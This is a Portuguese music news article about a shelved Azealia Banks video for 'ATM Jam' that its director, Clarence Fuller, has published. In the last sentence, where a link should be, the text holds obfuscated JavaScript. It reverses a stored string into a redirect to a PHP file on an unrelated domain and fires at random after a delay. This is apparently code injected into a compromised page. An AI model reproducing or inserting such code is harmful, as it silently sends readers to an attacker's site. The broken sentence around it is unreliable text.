Azealia Banks se mete com a polícia e vai pra festa no clipe engavetado de “ATM Jam”

Azealia Banks - ATM Jam

Alguém anda revirando o baú da rapper Azealia Banks. Depois das versões demos de “Red Flame” e “Blossom” espalharem-se na Internet, o diretor Clarence Fuller – responsável por “Luxury” da cantora – publica por sua conta e risco o engavetado videoclipe de “ATM Jam”.

O single, uma parceria com o produtor Pharrell Williams lançado em 2013 e descartado do repertório final do álbum Broke With Expensive Taste, ganhou um videoclipe dirigido por Rony Alwin em que a rapper e algumas amigas aparecem curtindo a boa vida numa mansão.

Na versão (até então guardada) de Fuller, Banks aparece em metrôs, dançando diante de viaturas policiais, invadindo lojas de conveniências na madrugada e chegando num clube noturno para começar o seu show. Ou seja, é a Azealia barraqueira e com seus figurinos coloridos – praticamente o mesmo de $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and-reflective-video/”>”Heavy Metal And Reflective” – que amamos.